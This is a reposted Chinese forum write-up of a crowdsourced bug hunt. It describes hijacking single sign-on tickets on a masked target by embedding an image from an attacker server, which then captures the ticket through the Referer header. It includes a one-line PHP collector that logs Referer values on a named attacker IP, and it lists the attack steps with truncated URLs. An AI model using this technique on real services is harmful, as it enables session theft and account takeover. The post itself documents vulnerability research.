安全矩阵

 找回密码
 立即注册
搜索
查看: 764|回复: 0

实战 | 漏洞挖掘之众测厂商 Ticket劫持漏洞

[复制链接]

181

主题

182

帖子

721

积分

高级会员

Rank: 4

积分
721
发表于 2023-2-9 10:56:12 | 显示全部楼层 |阅读模式
本帖最后由 wangqiang 于 2023-2-9 11:45 编辑

实战 | 漏洞挖掘之众测厂商 Ticket劫持漏洞
P喵呜 HACK学习呀
2023-02-07 09:00 发表于广东

0x00 前言
文章中的项目地址统一修改为: test.com 保护厂商也保护自己
0x01 前期准备
受害者账号: 18******977
攻击者账号: tsetaaaa
攻击者服务器:123.207.33.78
攻击文件:img_referer.php
攻击代码:<?php if ($_SERVER['HTTP_REFERER']) {    file_put_contents('./img_referer.txt', $_SERVER['HTTP_REFERER'].PHP_EOL, FILE_APPEND);}

0x02 场景
绕不过 service 字段的白名单验证所以换了此方法进行绕过获取

白名单触发:http://yun.test.com/index.php?r= ... ce=http://baidu.com
编辑
白名单通过:http://yun.test.com/index.php?r= ... xxxxxxxxx.test.com/
编辑
名单做的比较死只允许 *.test.com 跳转进行登录
思考了一下可以找一处可以显示插入图片的地方,利用图片来绕过获取到 ticket
0x03 攻击开始
0x03.1 登录攻击者账号准备攻击
编辑
攻击者空间装扮 url: http://yun.test.com/index.php?r= ... 18b83991a57ccb7175f
编辑
编辑
编辑
编辑
攻击者 url: http://yun.test.com/index.php?r= ... 18b83991a57ccb7175f
0x3.2 受害者上线
受害者记得要登录​​​​​​​
受害者打开 url: http://yun.test.com/index.php?r= ... 18b83991a57ccb7175f
编辑
编辑
编辑
编辑

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 22:52 , Processed in 0.012340 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表